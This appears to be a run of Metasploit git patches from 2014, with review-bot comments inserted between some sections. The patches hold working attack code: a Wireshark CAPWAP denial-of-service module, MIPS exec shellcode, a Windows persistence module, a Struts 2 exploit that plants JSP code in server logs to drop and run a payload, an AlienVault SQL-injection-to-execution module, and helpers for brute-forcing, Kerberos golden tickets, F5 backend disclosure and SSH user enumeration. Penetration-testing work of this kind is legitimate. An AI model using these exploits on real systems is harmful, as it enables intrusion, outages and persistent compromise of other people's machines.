@@ -0,0 +1,67 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = GoodRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark <= 1.8.7 CAPWAP dissector crash - DoS', + 'Description' => %q{ + This module inject malicioous packet udp to crash wireshark + ) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + ], + 'References' => + [ + [ 'CVE', '2013-4074'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'DisableNops' => 'True', + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Wireshark CAPWAP dissector CRASH', + { + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 28 2014', + 'DefaultTarget' => 0)) + + # Protocol capwap needs port 5247 to trigger the dissector in wireshark + register_options([ Opt::RPORT(5247) ], self.class) + + end + + def exploit + + connect_udp + + # We send a packet incomplete to crash dissector + print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") + buf = "\x90" * 18 + udp_sock.put(buf) + + disconnect_udp + + end +end From b0da032136d572c237ea8b64ee05b35b3095f913 Mon Sep 17 00:00:00 2001 From: JoseMi Date: Tue, 29 Apr 2014 23:06:30 +0100 Subject: [PATCH 205/853] Modified the metadatas --- modules/exploits/windows/misc/wireshark_capwap_dos.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb index 818d62692a..603f5e81ca 100644 --- a/modules/exploits/windows/misc/wireshark_capwap_dos.rb +++ b/modules/exploits/windows/misc/wireshark_capwap_dos.rb 
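Review bot: The metadata of this new module does not match what its code does: `exploit` only sends a fixed 18-byte buffer and never uses a payload, yet the class is declared as `Msf::Exploit::Remote` with `Rank = GoodRanking` plus `'Payload'` and `'EXITFUNC'` settings. A module whose only effect is to crash the target is normally classed as an auxiliary DoS module, so that anyone reading the module list is not misled about its impact. The `'Description'` block also contains a stray `)` line, which is still present in the `@@ -13,15` hunk of the following patch. `'DisclosureDate' => 'Apr 28 2014'` looks inconsistent with the `[ 'CVE', '2013-4074']` reference. The header comment URL `http//metasploit.com/download` is missing its colon.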
@@ -13,15 +13,17 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Wireshark <= 1.8.7 CAPWAP dissector crash - DoS', + 'Name' => 'Wireshark CAPWAP dissector crash', 'Description' => %q{ - This module inject malicioous packet udp to crash wireshark + This module inject malicious packet udp to crash wireshark. The crash is when we send + a incomplete packet and trigger capwap dissector. ) }, 'License' => MSF_LICENSE, 'Author' => [ 'j0sm1', # Exploit and msf module + 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" ], 'References' => [ From ace9e797e1326a1e8fc212d2e2f0da80b5c5b6e1 Mon Sep 17 00:00:00 2001 From: nstarke Date: Tue, 29 Apr 2014 22:10:08 +0000 Subject: [PATCH 206/853] Adding count-based print message This commit removes the creation of a separate, timed thread for printing out status messages to the user in the case of large PASS_FILEs. This adjustment eliminates the overheard of context switching associated with spinning off separate threads, as well as the dangers associated with the Thread#kill method. --- lib/msf/core/auxiliary/auth_brute.rb | 23 ++++++----------------- 1 file changed, 6 insertions(+), 17 deletions(-) diff --git a/lib/msf/core/auxiliary/auth_brute.rb b/lib/msf/core/auxiliary/auth_brute.rb index 076e818f5f..00140d8a79 100644 --- a/lib/msf/core/auxiliary/auth_brute.rb +++ b/lib/msf/core/auxiliary/auth_brute.rb 
@@ -331,22 +331,6 @@ module Auxiliary::AuthBrute creds = [ [], [], [], [] ] # userpass, pass, user, rest remaining_pairs = combined_array.length # counter for our occasional output - status = Thread.new do - loop do - # Ruby's sleep function is not terribly accurate. - # Since all we are trying to do is let the user know - # that the process is still working and giving them - # an estimate as to how many pairs are left, - # precision may not be of the utmost necessity - sleep 100 - # Let the user know the combined pair list is still building - # and tell them how many pairs are left to process. - print_brute( - :level => :vstatus, - :msg => "Pair list is still building with #{remaining_pairs} pairs left to process" - ) - end - end # Move datastore['USERNAME'] and datastore['PASSWORD'] to the front of the list. # Note that we cannot tell the user intention if USERNAME or PASSWORD is blank -- # maybe (and it's often) they wanted a blank. One more credential won't kill @@ -361,9 +345,14 @@ module Auxiliary::AuthBrute else creds[3] << pair end + if remaining_pairs % 500000 == 0 + print_brute( + :level => :vstatus, + :msg => "Pair list is still building with #{remaining_pairs} pairs left to process" + ) + end remaining_pairs -= 1 end - status.kill return creds[0] + creds[1] + creds[2] + creds[3] end From c3fb5bf61419732343462bd1ce0bc7e75f15e798 Mon Sep 17 00:00:00 2001 From: Rob Fuller Date: Tue, 29 Apr 2014 22:42:26 -0400 Subject: [PATCH 207/853] fix a few clarical errors and typos --- .../meterpreter/ui/console/command_dispatcher/kiwi.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb index be6500b771..628df53d87 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/kiwi.rb 
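Review bot: The progress check added in the `@@ -361,9` hunk uses the bare literal `500000` with no explanation of why that interval was chosen. Writing it as `500_000` with a short comment, for example `# report progress every 500_000 pairs so a large PASS_FILE shows signs of life`, would make the intent clear. The test also runs before `remaining_pairs -= 1`, so when `combined_array.length` is an exact multiple of the interval the message is printed on the very first pair; adding `&& remaining_pairs != combined_array.length` to the condition would avoid that. The enclosing method starts outside the hunk.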
@@ -146,9 +146,9 @@ class Console::CommandDispatcher::Kiwi "-u" => [ true, "Name of the user to create the ticket for" ], "-i" => [ true, "ID of the user to associate the ticket with" ], "-g" => [ true, "Comma-separated list of group identifiers to include (eg: 501,502)" ], - "-d" => [ true, "Name of the target domain" ], - "-k" => [ true, "Kerberos ticket granting token" ], - "-t" => [ true, "Path of the file to store the ticket in" ], + "-d" => [ true, "Name of the target domain (FQDN)" ], + "-k" => [ true, "krbtgt domain user NTLM hash" ], + "-t" => [ true, "Local path of the file to store the ticket in" ], "-s" => [ true, "SID of the domain" ] ) @@ -157,7 +157,7 @@ class Console::CommandDispatcher::Kiwi # def golden_ticket_create_usage print( - "\nUsage: kerberos_ticket_list [-h] -u -d -k -s [-i ] [-g -t \n\n" + + "\nUsage: golden_ticket_create [-h] -u -d -k -s -t [-i ] [-g ]\n\n" + "Create a golden kerberos ticket that expires in 10 years time.\n\n" + @@golden_ticket_create_opts.usage) end @@ -304,7 +304,7 @@ class Console::CommandDispatcher::Kiwi # Invoke the kerberos ticket purging functionality on the target machine. # def cmd_kerberos_ticket_purge(*args) - client.kiwi.keberos_ticket_purge + client.kiwi.kerberos_ticket_purge print_good("Kerberos tickets purged") end From 4e80e1c2397a953bc239623a1b4e3e5c7aa82225 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Wed, 30 Apr 2014 09:31:07 -0500 Subject: [PATCH 208/853] Clean up pull request code --- .../gather/f5_bigip_cookie_disclosure.rb | 113 +++++++++++------- 1 file changed, 72 insertions(+), 41 deletions(-) diff --git a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb index b1b57bd1d3..838bc2803e 100644 --- a/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb +++ b/modules/auxiliary/gather/f5_bigip_cookie_disclosure.rb 
@@ -12,10 +12,10 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'F5 Bigip Backend IP/PORT Cookie Disclosure.', + 'Name' => 'F5 BigIP Backend Cookie Disclosure', 'Description' => %q{ - This module identify F5 BigIP SLB and decode sticky cookies which leak - backend IP and port. + This module identify F5 BigIP Load Balancers and leaks backends + information through cookies. }, 'Author' => [ 'Thanat0s ' ], 'References' => 
@@ -29,66 +29,97 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('TARGETURI', [true, 'The URI path to test', '/']), - OptInt.new('RETRY', [true, 'Number of requests to try to find backends', 10]) + OptInt.new('REQUESTS', [true, 'Number of requests to send to disclose back', 10]) ], self.class) end - def cookie_decode(cookie_value) - m = cookie_value.match(/(\d+)\.(\d+)\./) - host = (m.nil?) ? nil : m[1] - port = (m.nil?) ? nil : m[2] - unless host.nil? && port.nil? - port = (("%04X" % port).slice(2,4) << ("%04X" % port).slice(0,2)).hex.to_s - byte1 = ("%08X" % host).slice(6..7).hex.to_s - byte2 = ("%08X" % host).slice(4..5).hex.to_s - byte3 = ("%08X" % host).slice(2..3).hex.to_s - byte4 = ("%08X" % host).slice(0..1).hex.to_s - host = byte1 << "." << byte2 << "." << byte3 << "." << byte4 + def change_endianness(value, size=4) + conversion = value + + if size == 4 + conversion = [value].pack("V").unpack("N").first + elsif size == 2 + conversion = [value].pack("v").unpack("n").first end - return host,port + + conversion + end + + def cookie_decode(cookie_value) + back_end = "" + + if cookie_value =~ /(\d{8})\.(\d{5})\./ + host = $1.to_i + port = $2.to_i + + host = change_endianness(host) + host = Rex::Socket.addr_itoa(host) + + port = change_endianness(port, 2) + + back_end = "#{host}:#{port}" + end + + back_end end def get_cookie # request a page and extract a F5 looking cookie. + cookie = {} res = send_request_raw({ 'method' => 'GET', 'uri' => @uri }) - id,value = nil - # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" - m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) - unless m.nil? - id = (m.nil?) ? nil : m[1] - value = (m.nil?) ? nil : m[2] - return id, value + + unless res.nil? + # Get the SLB session ID, like "TestCookie=2263487148.3013.0000" + m = res.get_cookies.match(/([\-\w\d]+)=((?:\d+\.){2}\d+)(?:$|,|;|\s)/) + unless m.nil? + cookie[:id] = (m.nil?) ? nil : m[1] + cookie[:value] = (m.nil?) ? 
nil : m[2] + end end + + cookie end def run - host_port = [] - @uri = normalize_uri(target_uri.path) - print_status("Starting request #{@uri}") - for i in 0...datastore['RETRY'] - id, value = get_cookie() # Get the cookie + unless datastore['REQUESTS'] > 0 + print_error("Please, configure more than 0 REQUESTS") + return + end + + back_ends = [] + @uri = normalize_uri(target_uri.path.to_s) + print_status("#{peer} - Starting request #{@uri}") + + for i in 0...datastore['REQUESTS'] + cookie = get_cookie() # Get the cookie # If the cookie is not found, stop process - unless id - print_error("F5 SLB cookie not found") - return + if cookie.empty? || cookie[:id].nil? + print_error("#{peer} - F5 Server Load Balancing cookie not found") + break end + # Print the cookie name on the first request if i == 0 - print_status("F5 cookie \"#{id}\" found") + print_status("#{peer} - F5 Server Load Balancing \"#{cookie[:id]}\" found") end - host, port = cookie_decode(value) - unless host_port.include? (host+":"+port) - host_port.push(host+":"+port) - print_status("Backend #{host}:#{port}") + + back_end = cookie_decode(cookie[:value]) + unless back_ends.include?(back_end) + print_status("#{peer} - Backend #{back_end} found") + back_ends.push(back_end) end end + # Reporting found backends in database - report_note( - :host => rhost, - :type => "F5_Cookie_Backends", - :data => host_port - ) + unless back_ends.empty? + report_note( + :host => rhost, + :type => "f5_load_balancer_backends", + :data => back_ends + ) + end + end end From 7777202045bbed04ad632470ca63414eb5b6fbaf Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 29 Apr 2014 10:48:32 -0500 Subject: [PATCH 209/853] Deconflict #3310 and correct the description --- .../auxiliary/scanner/ssh/ssh_enumusers.rb | 22 +++++++++---------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 6936ec3c07..374d15b2ca 100644 
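Review bot: In `run`, the value returned by `cookie_decode` is used without checking that decoding succeeded. `cookie_decode` returns `""` when its pattern does not match, and `run` then prints `Backend  found` and pushes the empty string into `back_ends`, which is later stored through `report_note`. This path looks reachable: the pattern in `cookie_decode`, `/(\d{8})\.(\d{5})\./`, is stricter than the one in `get_cookie` and does not match the example given in the comment there (`2263487148.3013.0000`). Add a guard right after the decode, `next if back_end.empty?`, so that only decoded values are reported. Separately, the ternaries `(m.nil?) ? nil : m[1]` inside `unless m.nil?` in `get_cookie` are redundant and can be plain `m[1]` and `m[2]`.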
--- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -16,17 +16,17 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SSH Username Enumeration', 'Description' => %q{ - This module uses a time-based attack to enumerate users in a OpenSSH server. - On some versions of OpenSSH under some configurations, OpenSSH will prompt - for a password for an invalid user faster than for a valid user. - }, - 'Author' => ['kenkeiras'], - 'References' => - [ - ['CVE', '2006-5229'], - ['OSVDB', '32721'], - ['BID', '20418'] - ], + This module uses a time-based attack to enumerate users on an OpenSSH server. + On some versions of OpenSSH under some configurations, OpenSSH will return a + "permission denied" error for an invalid user faster than for a valid user. + }, + 'Author' => ['kenkeiras'], + 'References' => + [ + ['CVE', '2006-5229'], + ['OSVDB', '32721'], + ['BID', '20418'] + ], 'License' => MSF_LICENSE )) From 111160147f64a8aac63b17fa01bdd0b6cb9f2d78 Mon Sep 17 00:00:00 2001 From: Michael Messner Date: Wed, 30 Apr 2014 20:37:54 +0200 Subject: [PATCH 210/853] MIPS exec payload fixes for encoder --- modules/payloads/singles/linux/mipsbe/exec.rb | 8 +++++++- modules/payloads/singles/linux/mipsle/exec.rb | 10 ++++++++-- 2 files changed, 15 insertions(+), 3 deletions(-) diff --git a/modules/payloads/singles/linux/mipsbe/exec.rb b/modules/payloads/singles/linux/mipsbe/exec.rb index a4e5dbda29..ed84d5faac 100644 --- a/modules/payloads/singles/linux/mipsbe/exec.rb +++ b/modules/payloads/singles/linux/mipsbe/exec.rb @@ -66,7 +66,13 @@ module Metasploit3 # # Constructs the payload # - return super + shellcode + command_string + "\x00" + + shellcode = shellcode + command_string + "\x00" + + # we need to align our shellcode to 4 bytes + (shellcode = shellcode + "\x00") while shellcode.length%4 != 0 + + return super + shellcode end 
diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb index b71feda883..03803e3399 100644 --- a/modules/payloads/singles/linux/mipsle/exec.rb +++ b/modules/payloads/singles/linux/mipsle/exec.rb @@ -62,12 +62,18 @@ module Metasploit3 "\xec\xff\xa0\xaf" + # sw zero,-20(sp) "\xe8\xff\xa5\x27" + # addiu a1,sp,-24 "\xab\x0f\x02\x24" + # li v0,4011 - "\x0c\x01\x01\x01" # + syscall 0x40404 + "\x0c\x01\x01\x01" # syscall 0x40404 # # Constructs the payload # - return super + shellcode + command_string + "\x00" + + shellcode = shellcode + command_string + "\x00" + + # we need to align our shellcode to 4 bytes + (shellcode = shellcode + "\x00") while shellcode.length%4 != 0 + + return super + shellcode end From fdc81b198f11d1c4d6cdb6ed612fce6dad1d9566 Mon Sep 17 00:00:00 2001 From: kaospunk Date: Wed, 30 Apr 2014 16:08:48 -0400 Subject: [PATCH 211/853] Adds the ability to specify path This update allows an explicit path to be set rather than purely relying on the TEMP environment variable. --- modules/exploits/windows/local/persistence.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 9ce47a82fc..6fffe1f172 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -42,6 +42,7 @@ class Metasploit3 < Msf::Exploit::Local OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]), OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]), OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']), + OptString.new('PATH',[false, 'PATH to write payload']), ], self.class) end 
@@ -130,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Local # Writes script to target host def write_script_to_target(vbs,name) - tempdir = session.sys.config.getenv('TEMP') + tempdir = datastore['PATH'] || session.sys.config.getenv('TEMP') if name == nil tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else From 6b740b727b78ac1e5aa85967ce90ae6c0a7d1ae5 Mon Sep 17 00:00:00 2001 From: kaospunk Date: Wed, 30 Apr 2014 17:26:36 -0400 Subject: [PATCH 212/853] Changes PATH to proper case This changes PATH to Path --- modules/exploits/windows/local/persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 6fffe1f172..b98e2e0970 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Local OptEnum.new('STARTUP', [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]), OptString.new('REXENAME',[false, 'The name to call payload on remote system.', nil]), OptString.new('REG_NAME',[false, 'The name to call registry value for persistence on remote system','']), - OptString.new('PATH',[false, 'PATH to write payload']), + OptString.new('PATH',[false, 'Path to write payload']), ], self.class) end From 8b138b2d37f95a17a83f1622817a38b543b5aadc Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 30 Apr 2014 16:34:33 -0500 Subject: [PATCH 213/853] Fix unquoted path in cleanup script --- modules/exploits/windows/local/persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index b98e2e0970..92d355c3d1 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb 
@@ -140,7 +140,7 @@ class Metasploit3 < Msf::Exploit::Local begin write_file(tempvbs, vbs) print_good("Persistent Script written to #{tempvbs}") - @clean_up_rc << "rm #{tempvbs}\n" + @clean_up_rc << "rm '#{tempvbs}'\n" rescue print_error("Could not write the payload on the target hosts.") # return nil since we could not write the file on the target host. From bd39af3965dd44fc8b17864aabbe50a989b5ab70 Mon Sep 17 00:00:00 2001 From: Julian Vilas Date: Thu, 1 May 2014 00:51:52 +0200 Subject: [PATCH 214/853] Fix target ARCH_JAVA and remove calls to sleep --- .../http/struts_code_exec_classloader.rb | 109 ++++++++++++++---- 1 file changed, 85 insertions(+), 24 deletions(-) diff --git a/modules/exploits/multi/http/struts_code_exec_classloader.rb b/modules/exploits/multi/http/struts_code_exec_classloader.rb index 7f040386e1..4bae6dd8ef 100644 --- a/modules/exploits/multi/http/struts_code_exec_classloader.rb +++ b/modules/exploits/multi/http/struts_code_exec_classloader.rb @@ -33,17 +33,18 @@ class Metasploit3 < Msf::Exploit::Remote 'References' => [ [ 'CVE', '2014-0094'], + [ 'CVE', '2014-0112'], [ 'URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'], [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html'] ], - 'Platform' => %w{ java linux win }, + 'Platform' => %w{ linux win }, 'Privileged' => true, 'Targets' => [ ['Windows Universal', { 'Arch' => ARCH_X86, - 'Platform' => 'windows' + 'Platform' => 'w' } ], ['Linux Universal', @@ -55,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Java Universal', { 'Arch' => ARCH_JAVA, - 'Platform' => 'java' + 'Platform' => ['win','linux'] }, ] ], @@ -81,6 +82,11 @@ class Metasploit3 < Msf::Exploit::Remote end + def is_log_flushed(resp, content) + return (resp.headers["Content-Length"] != "0") && (resp.body =~ /#{content}/) + end + + def exploit prefix_jsp = rand_text_alphanumeric(3+rand(3)) 
@@ -98,22 +104,54 @@ class Metasploit3 < Msf::Exploit::Remote jsp_file << date_format jsp_file << ".jsp" - vprint_status("#{peer} - created file at http://#{peer}/#{jsp_file}") + # Wait till the log is created + uri = "/" + uri << jsp_file - Rex.sleep(3) + created = false + + print_status("#{peer} - Waiting for the server to create the logfile") + + 10.times do |x| + select(nil, nil, nil, 2) + + # Now make a request to trigger payload + vprint_status("#{peer} - Countdown #{10-x}...") + res = exec_cmd(uri) + # Failure. The request timed out or the server went away. + if res.nil? + print_error("#{peer} - Not received response") + return + end + # Success if the server has flushed all the sent commands to the jsp file + if res.code == 200 + vprint_good("#{peer} - created file at http://#{peer}/#{jsp_file}") + created = true + break + end + end + + unless created + print_error("#{peer} - No log file was created") + return + end + + + if target['Arch'] == ARCH_JAVA + payload_exe = payload.encoded + else + payload_exe = generate_payload_exe + end + + payload_file = rand_text_alphanumeric(4+rand(4)) + payload_file << ".jsp" if (target['Arch'] == ARCH_JAVA) + register_files_for_cleanup("#{payload_file}", "#{jsp_file}") # Inexistent URI that logs on previously created log file (with ".jsp" suffix) uri = String.new(datastore['TARGETURI']) - uri << rand_text_alphanumeric(4+rand(4)) - uri << "?" - uri << rand_text_alphanumeric(1+rand(1)) - uri << "=" + uri << payload_file - - payload_exe = generate_payload_exe - - payload_file = rand_text_alphanumeric(4+rand(4)) - register_files_for_cleanup("#{payload_file}", "#{jsp_file}") + vprint_status("#{peer} - Dumping payload into the logfile") # Commands to be logged exec_cmd(uri, "<%@ page import=\"java.io.FileOutputStream\" %>") 
@@ -124,21 +162,44 @@ class Metasploit3 < Msf::Exploit::Remote exec_cmd(uri, "<% oFile.write(new sun.misc.BASE64Decoder().decodeBuffer(\"#{Rex::Text.encode_base64(payload_exe)}\")); %>") exec_cmd(uri, "<% oFile.flush(); %>") exec_cmd(uri, "<% oFile.close(); %>") - exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>") - exec_cmd(uri, "<% f.setExecutable(true); %>") - exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>") - vprint_status("#{peer} - Waiting 10 seconds...") + if target['Arch'] != ARCH_JAVA + exec_cmd(uri, "<% File f = new File(\"#{payload_file}\"); %>") + exec_cmd(uri, "<% f.setExecutable(true); %>") + exec_cmd(uri, "<% Runtime.getRuntime().exec(\"./#{payload_file}\"); %>") + end - Rex.sleep(10) - - vprint_status("#{peer} - Accessing http://#{peer}/#{jsp_file}") - - # Access the log (with ".jsp" extension) in order to execute the JSP notation logged sentences uri = "/" uri << jsp_file - exec_cmd(uri) + flushed = false + + print_status("#{peer} - Waiting for the server to flush the logfile") + + 10.times do |x| + select(nil, nil, nil, 2) + + # Now make a request to trigger payload + vprint_status("#{peer} - Countdown #{10-x}...") + res = exec_cmd(uri) + # Failure. The request timed out or the server went away. + if res.nil? + print_error("#{peer} - Not received response") + return + end + # Success if the server has flushed all the sent commands to the jsp file + if res.code == 200 && is_log_flushed(res, payload_file) + flushed = true + break + end + end + + unless flushed + print_error("#{peer} - Log not flushed on time") + return + end + + exec_cmd("/#{payload_file}") if (target['Arch'] == ARCH_JAVA) end From 9bcf5eadb7c7d02bf392255ae15dca72b2289804 Mon Sep 17 00:00:00 2001 From: xistence Date: Thu, 1 May 2014 10:10:15 +0700 Subject: [PATCH 215/853] Changes to alienvault module --- .../linux/http/alienvault_sqli_exec.rb | 23 ++++++++++++++++++- 1 file changed, 22 insertions(+), 1 deletion(-) 
diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index e22c6b0cc6..297785aee5 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -54,7 +54,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(443), - OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']) + OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']), + OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 0 ]) ], self.class) end @@ -270,6 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 404 print_status("#{peer} - Payload delivered") + Rex.sleep(datastore['WAIT']) else fail_with(Failure::Unknown, "#{peer} - Payload failed!") end @@ -328,6 +330,25 @@ class Metasploit3 < Msf::Exploit::Remote else print_warning("#{peer} - Unable to remove Action ID") end + + # Reload the policies to revert back to the state before exploitation + print_status("#{peer} - Reloading Policies") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "ossim", "conf", "reload.php"), + 'cookie' => @cookie, + 'vars_get' => { + 'what' => 'policies', + 'back' => '../policy/policy.php' + } + }) + + if res && res.code == 200 + print_status("#{peer} - Policies reloaded!") + else + fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") + end + ensure super # mixins should be able to cleanup even in case of Exception end From c12d72b58c2d47c8520dd9e28b69f564092f99f3 Mon Sep 17 00:00:00 2001 From: xistence Date: Thu, 1 May 2014 10:39:11 +0700 Subject: [PATCH 216/853] Changes to alienvault module --- .../linux/http/alienvault_sqli_exec.rb | 22 ++++--------------- 1 file changed, 4 insertions(+), 18 deletions(-) 
diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index 297785aee5..db85ce3a90 100644 --- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote [ Opt::RPORT(443), OptString.new('TARGETURI', [true, 'The URI of the vulnerable Alienvault OSSIM instance', '/']), - OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 0 ]) + OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 3 ]) ], self.class) end @@ -255,27 +255,13 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 print_status("#{peer} - Policies reloaded!") + wait = datastore['WAIT'].to_i + print_status("#{peer} - Waiting #{wait} seconds for the payload to execute") + Rex.sleep(wait) else fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") end - - # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. - dont_exist = rand_text_alpha(8+rand(4)) - print_status("#{peer} - Triggering policy and action by requesting a non existing url") - res = send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, dont_exist), - 'cookie' => @cookie - }) - - if res && res.code == 404 - print_status("#{peer} - Payload delivered") - Rex.sleep(datastore['WAIT']) - else - fail_with(Failure::Unknown, "#{peer} - Payload failed!") - end - end From 5db24b83517524f18fb2fbb907968384c0d8dccf Mon Sep 17 00:00:00 2001 From: xistence Date: Thu, 1 May 2014 14:53:55 +0700 Subject: [PATCH 217/853] Fixes/Stability AlienVault module --- .../linux/http/alienvault_sqli_exec.rb | 20 +++++++++++++++++-- 1 file changed, 18 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/http/alienvault_sqli_exec.rb b/modules/exploits/linux/http/alienvault_sqli_exec.rb index db85ce3a90..463a44530f 100644 
--- a/modules/exploits/linux/http/alienvault_sqli_exec.rb +++ b/modules/exploits/linux/http/alienvault_sqli_exec.rb @@ -180,8 +180,9 @@ class Metasploit3 < Msf::Exploit::Remote 'dests[]' => '00000000000000000000000000000000', # Destination is ANY 'portsrc[]' => '0', # Any source port 'portdst[]' => '0', # Any destination port - 'plug_type' => '0', # Any plugin type + 'plug_type' => '1', # Taxonomy 'plugins[0]' => 'on', + 'taxfilters[]' =>'20@13@118', # Product Type: Operating System, Category: Application, Subcategory: Web - Not Found 'tax_pt' => '0', 'tax_cat' => '0', 'tax_subc' => '0', @@ -255,11 +256,26 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 print_status("#{peer} - Policies reloaded!") + else + fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") + end + + # Request a non-existing page, which will trigger a SIEM event (and thus our payload), but not an alarm. + dontexist = rand_text_alpha(8+rand(4)) + print_status("#{peer} - Triggering policy and action by requesting a non existing url") + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, dontexist), + 'cookie' => @cookie + }) + + if res and res.code == 404 + print_status("#{peer} - Payload delivered") wait = datastore['WAIT'].to_i print_status("#{peer} - Waiting #{wait} seconds for the payload to execute") Rex.sleep(wait) else - fail_with(Failure::Unknown, "#{peer} - Policy reloading failed!") + fail_with(Failure::Unknown, "#{peer} - Payload failed!") end end From f0a8f40acdbcba69e800a42ca4f41381e52db9b9 Mon Sep 17 00:00:00 2001 
From: nstarke Date: Thu, 1 May 2014 13:41:15 +0000 Subject: [PATCH 218/853] Omitting timestamp from msfconsole search output SeeRM #8795 The disclosure date field in the results from the search command where returning with a timestamp that was almost always 00:00:00 UTC. I added a bit of date time formatting to only include the year (4 digit), month (2 digit), and day (2 digit) in the following format: Y-m-d. This date time formatting applies to both searches conducted through the database instance as well as searches performed without a database (slow search). --- lib/msf/ui/console/command_dispatcher/core.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index fcd294fa6c..d9aa5976ce 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1488,7 +1488,7 @@ class Core next if not o if not o.search_filter(match) - tbl << [ o.fullname, o.disclosure_date.to_s, o.rank_to_s, o.name ] + tbl << [ o.fullname, o.disclosure_date.strftime("%Y-%m-%d"), o.rank_to_s, o.name ] end end end @@ -1503,7 +1503,7 @@ class Core def search_modules_sql(search_string) tbl = 